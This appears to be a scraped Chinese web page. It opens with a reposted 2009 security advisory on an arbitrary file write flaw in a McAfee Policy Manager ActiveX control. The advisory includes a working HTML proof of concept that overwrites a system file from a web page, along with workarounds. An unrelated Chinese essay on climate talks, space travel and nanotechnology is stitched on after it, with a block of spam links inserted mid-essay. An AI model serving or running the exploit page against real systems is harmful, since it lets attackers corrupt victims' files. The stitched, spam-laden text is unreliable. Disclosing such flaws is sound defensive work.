McAfee 3.6.0.608 naPolicyManager.dll ActiveX 任意数据写入漏洞

miaoluck

GOODFELLAS Security Research TEAM
http://goodfellas.shellcode.com.ar
Greetings to str0ke


McAfee, Inc. 3.6.0.608 Policy Manager naPolicyManager.dll Arbitrary Data Write
==============================================================================

Internal ID: VULWAR20090616.
-----------


Introduction
------------

naPolicyManager.dll is a library included in the Program Mc Afee inc.


Tested In
---------

- Windows XP SP1/SP2 french/english with IE 6.0 / 7.0.


Summary
-------

The WriteTaskDataToIniFile method doesn't check if it's being called from the
application or from a malicious user. A Remote Attacker could craft a
html page and overwrite arbitrary files in a system.


Impact
------

The vulnerability could allow malicious users to write arbitrary data on a
vulnerable system that uses this software.


Workaround
----------

- Activate the Kill bit zero in the clsid corresponding to the software.
- Unregister naPolicyManager.dll using regsvr32.


Timeline
--------

July 16 2009 -- Bug Discovery.
July 16 2009 -- POC published.


Credits
-------

* callAX <bemariani@gmail.com>


Technical Details
-----------------

WriteTaskDataToIniFile method receives one argument filename in this format
"c:\path\file".


Proof of Concept
---------------

<HTML>
<BODY>
<object id=ctrl classid="clsid:{04D18721-749F-4140-AEB0-CAC099CA4741}"></object>
<SCRIPT>
function Do_1t()
{
   File = "C:\b00t.ini"
   ctrl.WriteTaskDataToIniFile(File)
}
</SCRIPT>
<input language=JavaScript onclick=Do_1t() type=button value="P0c">
</BODY>
</HTML>

山巷放

靠约束人类欲望的方式来维持人类的生存。这就是这次世界气候大会的主题。
　　当然，比之过去核威慑时代，用毁灭对方的威胁来维持自己的生存。整个人类，还是，进步了一点点。
　　其实，欲望这种东西，从来是无穷尽的。历史已经无数次证明，这种方式的脆弱与无效。
　　中国最大方了，单位“鸡滴屁”能耗下降40%。现在是1吨“碳”，2020年是0.6吨“碳”。不过，按当前的发展速度，恐怕到2020年，翻一番都打不住。那万一翻两番，那就是2.4吨“碳”了。
　　真是理直气壮地把老外当傻瓜忽悠了。

　　人类的生存和发展，不是我能奢谈的话题。所以，我只能空想。解决生存和解决发展，各有一个领域的重大技术问题要解决。
　　一、生存基础
　　彻底解决人类生存问题，其实只有一条路。那就是，再造一个地球。其实不够，再造N个地球。这个领域的重大问题亟待解决的是，太空动力学。
　　只有改造其他星球，拓展生存空间，才是维持人类存在的根本问题。可惜，这个领域，现在一点眉目都没有。无限远的宇宙空间距离，让人类睁眼兴叹。
　　在过去的几百年间，无数最优秀的科学家，包括巨牛的那个牛顿，都断言，凡是人类制造的重于空气的物体，都无法飞上天。这个铁律，被不经意中发现的伯努比定律彻底打败了。
　　人类发现伯努比定律，是如此的偶然，也是如此的必然。于是，人类发现了鸟类滑翔的真相，发现了空气动力学。于是，有了飞机。
　　或许也是需要这个偶然来促成另外一个必然：太空动力学。发现空气动力学，还有一个小鸟做参照，知道有东东可以飞翔蓝天。可是，我们从来没有见过任何穿越宇宙的生命体。这，让穿越太空的理论基础，完全没有一个实物的参照，便注定被笼罩上比空气动力学难上百倍的迷雾。
　　其实，太空动力学也许就是一层薄膜，我们没有捅破，远在几十万、几亿光年外的璀璨星空，其实，我们捅破了那层膜，就在眼前。可惜我们不知道往哪捅、捅啥、用啥来捅……
　　人类的生存基础，就是这样毫无头绪、毫无希望、毫无曙光的渺茫。
　　二、发展基础
　　不过，人类的发展基础，却现实得多。那就是纳米技术。
　　纳米技术已经能让人类，用原子摆出“IBM”这样的字母排列。既然能够调整原子，就能够调整分子；既然能够调整分子，当然可以改造有机物质；能够改造有机物质，就可以改造基因；能够改造基因……不用说了，人类可以创造任何物质。可以让所有的女人都改容艳丽、永葆青春，所有的男人永不衰老；可以把所有的石墨变成钻石、所有的有机物成为佳肴；可以让全人类都只按电钮而获得所有的物质享受；可以让地球资源永不枯竭，只要有足够的能源。共产主义的真实前景，将假纳米技术，成为现实：所有限制等级的物质财富，都失去意义。
　　这是人类能看到的。也许也就几百年就要实现的前景。
http://www.guangtai180.cn/
http://www.aofanguoji.com/
http://www.hydm888.cn/
http://www.hnxdtx.com/
http://www.gzyongchuang.com/
http://www.hongyutuliao.cn/
http://www.tdcybj.cn/
http://www.0411liantong.com/
http://www.gzljl.com
http://www.xflfsp.cn/
http://www.esin2008.com/
http://www.xinsecaisheying.com/
http://www.jsmlft.com/
http://www.bqqsj.com/
　　可惜，这只是发展前景，却无法解决生存基础。这种发展前景，在人类私欲面前，同样脆弱得一塌糊涂。人性的丑恶，集中体现在对同类的优越感上（这个太复杂，懒得展开说）。在没有解决生存基础的问题的前提下，越是让人憧憬的发展手段，恐怕，只是越早提前终结地球的承载极限罢了。
　　物理学上貌似说，穿越宏观太空的技术，其实可以再微观纳米技术的发展中衍生出来（我还是懒。这个东西说了太复杂，懒得敲字了）。我们期望如此吧。